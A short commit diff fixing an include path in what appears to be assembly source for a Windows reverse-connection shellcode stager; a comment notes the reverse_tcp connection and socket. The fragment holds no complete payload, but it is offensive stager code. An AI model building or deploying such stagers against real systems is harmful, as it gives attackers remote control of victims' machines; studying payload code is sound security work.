Bugfix: correct reference to asm file

This commit is contained in:
Cristina Muñoz
2019-11-12 09:30:27 -08:00
parent 9dfd325f42
commit e804745766
@@ -14,6 +14,6 @@
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_winhttp_http.asm"
%include "./src/block/block_reverse_winhttp.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.